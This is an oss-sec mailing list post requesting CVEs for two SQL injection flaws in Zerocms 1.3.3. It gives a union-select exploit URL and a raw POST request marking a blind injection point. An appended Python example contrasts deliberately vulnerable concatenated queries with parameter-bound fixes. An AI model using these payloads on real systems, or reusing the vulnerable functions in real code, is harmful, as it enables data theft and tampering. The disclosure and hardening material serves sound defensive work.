oss-sec mailing list archives

Re: CVE-Request -- Zerocms <= v. 1.3.3 -- SQL injection vulnerabilities


From: Steffen Rösemann <steffen.roesemann1986 () gmail com>
Date: Sun, 1 Feb 2015 15:49:16 +0100

I just got a reply from MITRE.

I missed that the first SQL injection vulnerability had already been
assigned CVE-2014-4034. Sorry, I missed that one.


Greetings.

Steffen

2015-02-01 9:15 GMT+01:00 Steffen Rösemann <steffen.roesemann1986 () gmail com>:

Hi Steve, Josh, vendors, list.

I found two SQL injection vulnerabilities in Zerocms <= v. 1.3.3.

The first SQL injection vulnerability is located in the article_id
parameter used in zero_view_article.php and can be exploited even by
unauthenticated attackers.

See the following exploit-example:

http://{TARGET}/views/zero_view_article.php?article_id=-1+union+select+database%28%29,2,version%28%29,user%28%29,5,6+--+

The second vulnerability is a Blind SQL injection and is located in the
user_id parameter used in a POST request in zero_transact_user.php.

An attacker can exploit this vulnerability in the administrative backend
via the following POST request exploit-example:

POST /views/zero_transact_user.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://{TARGET}/views/zero_user_account.php?user_id=2
Cookie: PHPSESSID=rirftt07h0dem8d48lujliuve6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

name=user&email=user%40user.de&access_level=1&user_id=2 {SQL injection goes here}&action=Modify+Account

Could you please assign a CVE-ID for this?

Thank you very much.

Greetings from Germany.

Steffen Rösemann

References:

[1] http://aas9.in/zerocms/
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-13.html
[3] https://github.com/perezkarjee/zerocms/issues/3
[4] https://github.com/sroesemann/zerocms
[5] https://twitter.com/sroesemann/status/559273548691546113
[6] http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-14.html
[7] http://seclists.org/fulldisclosure/2015/Feb/4
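Both issues in the advisory above come down to the same defect: a request parameter (article_id in the GET handler, user_id in the POST handler) is placed into the SQL statement as text instead of being bound as a typed value. The following Python/sqlite3 example is an added illustration written for this archive page; it is not Zerocms code and the table layout, function names and sample rows are constructed assumptions. It puts the concatenating pattern next to a hardened version that allow-lists the id as a decimal integer and then binds it as a query parameter, and shows that the union-style input from the advisory alters the result set in the first case and is rejected before reaching the database in the second.

```python
import re
import sqlite3


# Constructed toy schema for this example: a CMS-style articles table and a users table.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT, access_level INTEGER)"
    )
    conn.execute("INSERT INTO articles VALUES (1, 'Welcome', 'First post')")
    conn.execute("INSERT INTO users VALUES (2, 'user', 'user@example.com', 1)")
    conn.commit()
    return conn


class InvalidId(ValueError):
    """Raised when a request parameter that must be a numeric id is not one."""


def parse_int(value):
    # Allow-list check: the parameter must be a plain decimal integer and nothing else.
    # Anything that is not, including the advisory's union-select input, is refused here.
    if not re.fullmatch(r"[0-9]+", value):
        raise InvalidId(value)
    return int(value)


def view_article_vulnerable(conn, article_id):
    # The defective pattern: an untrusted GET parameter concatenated straight into SQL.
    sql = "SELECT id, title, body FROM articles WHERE id = " + article_id
    return conn.execute(sql).fetchall()


def view_article_hardened(conn, article_id):
    # Validate the type first, then bind the value so it can never be parsed as SQL.
    sql = "SELECT id, title, body FROM articles WHERE id = ?"
    return conn.execute(sql, (parse_int(article_id),)).fetchall()


def modify_account_vulnerable(conn, user_id, name, email, access_level):
    # Same defect in the POST handler: every field, including user_id, is interpolated.
    sql = (
        "UPDATE users SET name = '%s', email = '%s', access_level = %s WHERE id = %s"
        % (name, email, access_level, user_id)
    )
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def modify_account_hardened(conn, user_id, name, email, access_level):
    # Text fields are bound as parameters; numeric fields are type-checked and bound.
    sql = "UPDATE users SET name = ?, email = ?, access_level = ? WHERE id = ?"
    cur = conn.execute(sql, (name, email, parse_int(access_level), parse_int(user_id)))
    conn.commit()
    return cur.rowcount


if __name__ == "__main__":
    conn = make_db()
    # Mirrors the advisory's article_id input shape (sqlite_version() standing in for version()).
    injected = "-1 UNION SELECT 1, 'injected', sqlite_version() -- "
    print(view_article_vulnerable(conn, injected))   # an attacker-chosen row comes back
    try:
        view_article_hardened(conn, injected)
    except InvalidId as exc:
        print("rejected before the query ran:", exc)
```

The regex allow-list is the first line of defence because it fails closed on any unexpected shape; the parameter binding is the second, and it is the one that matters even for fields such as name and email where no allow-list is possible. Logging the InvalidId rejections also gives a cheap detection signal for probing of these parameters.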

